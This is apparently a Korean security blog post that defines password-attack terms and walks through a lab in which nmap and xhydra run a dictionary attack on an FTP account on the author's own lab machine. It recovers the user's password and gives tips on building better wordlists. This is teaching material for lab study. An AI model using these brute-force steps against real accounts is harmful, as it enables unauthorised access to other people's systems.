- 용어 설명
password guessing attack : 암호 추측 공격 /* 암호로 설정 했을법한 것들 위주로 공격 */
default password attack : 기본 암호 공격
dictionary attack : 사전 대입 공격 /* 사전에 있는 단어들로 공격 */
brutus attack(brute-force attack): 무작위 대입 공격
Local password crack (offline password crack) : John The Ripper /* 이미 서버에 ID가 있는 방식 서버에 접속해서 root의 비밀번호를 획득 */
Remote password crack(online password crack) : Hydra /* 외부에서 root의 비밀번호를 획득 */
- 암호 크랙 실습
( kali ) xhydra ---- remote password crack ------> ( linux200 ) ftp
( linux 200 )
ftp 서버 확인
# chkconfig vsftpd on
# service vsftpd restart
# grep user01 /etc/passwd /* user01 사용자 없으면 만들어 줍니다. passwd는 user01 */
( kali )
# nmap 192.168.27.200 /* ftp 서비스 열려있는지 확인 */
|
Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-21 23:33 KST Nmap scan report for 192.168.27.200 Host is up (0.00043s latency). Not shown: 993 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 443/tcp open https MAC Address: 00:0C:29:78:75:EC (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds |
|
# mkdir -p /test
# cd /test && rm -rf /test/*
# cat > dict.txt /* dictionary file 생성 */
|
admin admin1 user01 test test1 <CTRL + D > |
|
# xhydra &
> IP 192.168.27.200
> Port 21 / Protocol ftp
> Show Attempts
> Username user01 /* 사용자의 ID는 알고 있다고 가정한다. */
- XXXX@google.com 일경우 보통 XXXX는 ID 이다. ID는 노출이 많이 되므로 아이디는 알고 있다고 가정
> Password List 빈칸 클릭
>파일시스템 > test > dict.txt 클릭
> 확인
> Start
> user01 의 password가 user01임을 찾아냈다.
password를 빠르게 찾아내려면 좋은 사전 파일을 만드는 것이 중요하다.
인터넷상에서 받은 사전 파일 : a.txt
직접 생성한 파일 : b.txt
# cat a.txt b.txt | sort -u > c.txt
'Security > Network Security' 카테고리의 다른 글
DNS Spoofing (0) | 2017.10.22 |
---|---|
Ettercap을 이용한 Packet Sniffing (0) | 2017.10.21 |
UDP Flooding Attack (0) | 2017.10.21 |
TCP Syn Flooding Attack 보안 방법 (0) | 2017.10.21 |
TCP Syn Flooding Attack (0) | 2017.10.21 |